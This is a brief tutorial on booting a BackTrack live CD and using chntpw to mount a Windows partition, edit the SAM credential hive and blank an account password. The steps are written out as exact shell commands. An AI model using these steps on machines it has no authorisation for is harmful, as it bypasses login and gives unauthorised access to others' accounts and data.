Before beginning, you should know what a hash is and how and where passwords are stored as hashes in Windows.
To crack a Windows password using Backtrack you need a Backtrack CD. Insert the CD and boot from it. Backtrack has many offline password cracking tools pre-installed; we will use one of them.
From the tool's terminal we create a directory and mount on it the Windows partition that holds the SAM file, which is in system32/config.
Continue with the following steps:
step 1 open applications>Backtrack>Privilege Escalation>Password Hacks>Offline Attacks>chntpw
step 2 type fdisk -l
step 3 type mkdir /mnt/apple
step 4 type mount -t ntfs-3g /dev/sda1 /mnt/apple
step 5 type ./chntpw -l /mnt/apple/WINDOWS/system32/config/SAM
step 6 type ./chntpw /mnt/apple/WINDOWS/system32/config/SAM
step 7 once you have the user edit menu, select the appropriate option; here we want to clear the password, so type 1 and press Enter
step 8 now it will ask whether to write the hive files, so type y and press Enter